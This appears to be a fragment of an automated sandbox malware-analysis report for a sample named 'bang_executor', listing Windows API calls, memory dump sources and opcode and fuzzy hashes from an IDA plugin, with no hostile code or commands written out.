                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$ErrorLast_wcslen
                                        • String ID:
                                        • API String ID: 2260680371-0
                                        • Opcode ID: 5772097a335126221e50021643e5b9dbceda9c4e21eab005c47b3c93b3fb6ce1
                                        • Instruction ID: 74f518a0a8bff2d69b95cd071eb851407ae02a4a8a92b07004b218b1114e15a5
                                        • Opcode Fuzzy Hash: 5772097a335126221e50021643e5b9dbceda9c4e21eab005c47b3c93b3fb6ce1
                                        • Instruction Fuzzy Hash: DA11C631604294AADB11AB738C09BEF7798DF1D702F00449AF901D6291DB2CDE45CEED
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0050DF08
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Info
                                        • String ID:
                                        • API String ID: 1807457897-3916222277
                                        • Opcode ID: db2b7f2a49170b5a320c95cee2d3ffd79b1861f5f7535e4458dcd93884efa989
                                        • Instruction ID: 6c530edb241e1381af523b9306643119b162994abeaf35677cb0513f31d2b418
                                        • Opcode Fuzzy Hash: db2b7f2a49170b5a320c95cee2d3ffd79b1861f5f7535e4458dcd93884efa989
                                        • Instruction Fuzzy Hash: 11411A7050428D9ADF218E648C99BFEBFB9FF45304F2448ECE59A86182D275AA45DF20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 0050D62D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: String
                                        • String ID: LCMapStringEx
                                        • API String ID: 2568140703-3893581201
                                        • Opcode ID: 6830b010255f97809229f1538c1caf0ca289e90294ea3dae79848af16618ca2b
                                        • Instruction ID: e40a7394492347429139a922de453951f2bdc736ffa5c877228867f7ed49d95b
                                        • Opcode Fuzzy Hash: 6830b010255f97809229f1538c1caf0ca289e90294ea3dae79848af16618ca2b
                                        • Instruction Fuzzy Hash: 59011336601209BBDF126F90DD0ADEE7F72FF58710F044114FE18261A0CA728971AB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0050CBBF), ref: 0050D5A5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CountCriticalInitializeSectionSpin
                                        • String ID: InitializeCriticalSectionEx
                                        • API String ID: 2593887523-3084827643
                                        • Opcode ID: 3bf83266ca8221f399989bc916f1bb0e2add5ea281cac7472554e7f62246ebfa
                                        • Instruction ID: 13d3b5f71f015f5b0c9a7ad5b99cc34ac255dfbdf9d19bdaabc783c325d96187
                                        • Opcode Fuzzy Hash: 3bf83266ca8221f399989bc916f1bb0e2add5ea281cac7472554e7f62246ebfa
                                        • Instruction Fuzzy Hash: 9AF0B43568221DBBDB126FA4DD06DEEBF61FF68710B004165FC04561A0CA754E50EBD1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Alloc
                                        • String ID: FlsAlloc
                                        • API String ID: 2773662609-671089009
                                        • Opcode ID: 6ea507ea87f0b50f6a87663b7fa55c585d6d84f59a14c47f73b14d80d0492f5d
                                        • Instruction ID: 8c5b7b8ac3722675ca90ededc032afd7219eae0dab87cc3a70f274087e0f1071
                                        • Opcode Fuzzy Hash: 6ea507ea87f0b50f6a87663b7fa55c585d6d84f59a14c47f73b14d80d0492f5d
                                        • Instruction Fuzzy Hash: B6E05534686259B7E6126BA49C06EADBF65EBA8720F010169FC0512280C9B45E40A29A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 005010BA
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: 3To
                                        • API String ID: 1269201914-245939750
                                        • Opcode ID: 436de927b89b44cf469f62f893459e749d6bf3656526182359c5eb8715b0a642
                                        • Instruction ID: bd4cd0bf21e232694ecdb8fa924e0675ce0113b9ab0551a3ecaf55fa756f238e
                                        • Opcode Fuzzy Hash: 436de927b89b44cf469f62f893459e749d6bf3656526182359c5eb8715b0a642
                                        • Instruction Fuzzy Hash: ECB092A229D501AD72242144A91A87A0A08F2C4B143209A2AF484C00C095402CC41033
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00500A5D
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: FjuKP
                                        • API String ID: 1269201914-3925404558
                                        • Opcode ID: 1b9fbbe70b55f9b3ddd9587e2b30b2f92c062d0ed721c26e84f2d01f23571442
                                        • Instruction ID: e0f1a3978abb402d59d4545a88b451d2c75812cd35aa3b5f25929f5bdec0984d
                                        • Opcode Fuzzy Hash: 1b9fbbe70b55f9b3ddd9587e2b30b2f92c062d0ed721c26e84f2d01f23571442
                                        • Instruction Fuzzy Hash: F1B012D239C501ECB20451999D16E7F0E8CF2C4B15B30B83AF444C00C0D8411C438132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00500A5D
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: FjuKP
                                        • API String ID: 1269201914-3925404558
                                        • Opcode ID: a5b15196bc0f57de467cbc5256ba7df73ee53495367e85152fc326a556b51ed2
                                        • Instruction ID: 3a640aecc29957b7ea77ad9669f4b4f1ce004b87d3e369e27c4b48f9bbf37e13
                                        • Opcode Fuzzy Hash: a5b15196bc0f57de467cbc5256ba7df73ee53495367e85152fc326a556b51ed2
                                        • Instruction Fuzzy Hash: B4B012D23AC601FC734451999C16E7E0E8CF2C4B15B30B92AF044C00C0D8401C814132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00500A5D
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: FjuKP
                                        • API String ID: 1269201914-3925404558
                                        • Opcode ID: 0ce1daf717b459e57e980d325e86ff66c91c5355c08cc5188c0b1034a84e5680
                                        • Instruction ID: eddd659015b8b30c302dcddccf8ebef187b3cae389465504186f986daeb13cd0
                                        • Opcode Fuzzy Hash: 0ce1daf717b459e57e980d325e86ff66c91c5355c08cc5188c0b1034a84e5680
                                        • Instruction Fuzzy Hash: B3B012D239C501FC720451999C16E7E0E8CF2C4B15B30F82AF444C10C0D8401C4D4132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00500A5D
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: FjuKP
                                        • API String ID: 1269201914-3925404558
                                        • Opcode ID: 90fab09e8222c613238a4a6c529054a81cd1b9ba6b0aa0d77c74654a6c1a97dd
                                        • Instruction ID: 37ef5aede3f97358d9d586fdf0994c3fd2fc6578f88d403e4b9edbda3410e6ee
                                        • Opcode Fuzzy Hash: 90fab09e8222c613238a4a6c529054a81cd1b9ba6b0aa0d77c74654a6c1a97dd
                                        • Instruction Fuzzy Hash: 06A002D6799501BC711551959D1AE7E0B5CF5C0B15B30A919F545D40C1684118455131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00500A5D
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: FjuKP
                                        • API String ID: 1269201914-3925404558
                                        • Opcode ID: 53ddd8186f785655e33e784aa630b8f327bb5ed95d92d83e3c1d179f393602c7
                                        • Instruction ID: 432899cbcc7f0968c79e7be3ac8101e936f0e04cb707eec90aca30af5c403aa4
                                        • Opcode Fuzzy Hash: 53ddd8186f785655e33e784aa630b8f327bb5ed95d92d83e3c1d179f393602c7
                                        • Instruction Fuzzy Hash: EEA002D679D502FC711551959D16D7E0A5CF5C4B55B30AD19F445C40C1584118455131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00500A5D
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: FjuKP
                                        • API String ID: 1269201914-3925404558
                                        • Opcode ID: 91a75622b4bdbfa87e5186d00677a8fe924d6d27de89b900df4a7ff15ba667e3
                                        • Instruction ID: 432899cbcc7f0968c79e7be3ac8101e936f0e04cb707eec90aca30af5c403aa4
                                        • Opcode Fuzzy Hash: 91a75622b4bdbfa87e5186d00677a8fe924d6d27de89b900df4a7ff15ba667e3
                                        • Instruction Fuzzy Hash: EEA002D679D502FC711551959D16D7E0A5CF5C4B55B30AD19F445C40C1584118455131
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0050DE0B: GetOEMCP.KERNEL32(00000000,?,?,0050E094,?), ref: 0050DE36
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0050E0D9,?,00000000), ref: 0050E2B4
                                        • GetCPInfo.KERNEL32(00000000,0050E0D9,?,?,?,0050E0D9,?,00000000), ref: 0050E2C7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CodeInfoPageValid
                                        • String ID:
                                        • API String ID: 546120528-0
                                        • Opcode ID: 0cb5ddf897b96de79897524fa298f0fca5f1ff1b4ddf9caf423abe80cd83c065
                                        • Instruction ID: baad3aaf05c027158f8f80b4cd2435d5c3a47fe08a47db23a4cf97e16a3bda7b
                                        • Opcode Fuzzy Hash: 0cb5ddf897b96de79897524fa298f0fca5f1ff1b4ddf9caf423abe80cd83c065
                                        • Instruction Fuzzy Hash: 8651E2709002069EDB258F75C8866FEBFE5FF41300F288CAED4968B1D1D635A985CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,004EB43B,00000800,00000800,00000000,?,?,004EA31D,?), ref: 004EB5EB
                                        • GetLastError.KERNEL32(?,?,004EA31D,?,?,?,?,?,?,?,?), ref: 004EB5FA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ErrorFileLastPointer
                                        • String ID:
                                        • API String ID: 2976181284-0
                                        • Opcode ID: 45059036fc8525122dd56d6cf3309d64ce81b696f4b5d6820d16ed6644d334dc
                                        • Instruction ID: 1ccc491e53dca50986c1585e5505126d98fdcf74151601e2438bf82d4aac34cd
                                        • Opcode Fuzzy Hash: 45059036fc8525122dd56d6cf3309d64ce81b696f4b5d6820d16ed6644d334dc
                                        • Instruction Fuzzy Hash: 2841D4312043C1ABD7209F66D9849BB73E5FF58326F10462FE54583381D7B8D8858BDA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,004EB967,?,?,004E87FD), ref: 004EB0A4
                                        • CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,004EB967,?,?,004E87FD), ref: 004EB0D4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: a6fb189dc8fed9ed2bce291188a9faf46d6b32807603041b176093d3562e9634
                                        • Instruction ID: ff1de08daa8bce525411fde1fe028b26fddf507e961d957804cfab93e5145da0
                                        • Opcode Fuzzy Hash: a6fb189dc8fed9ed2bce291188a9faf46d6b32807603041b176093d3562e9634
                                        • Instruction Fuzzy Hash: 1221B1715043846FE3308B26CC89BB7B7DCEB88315F004A1EF9A5C22D1D778B84486A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • FlushFileBuffers.KERNEL32(?), ref: 004EB7FC
                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 004EB8B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
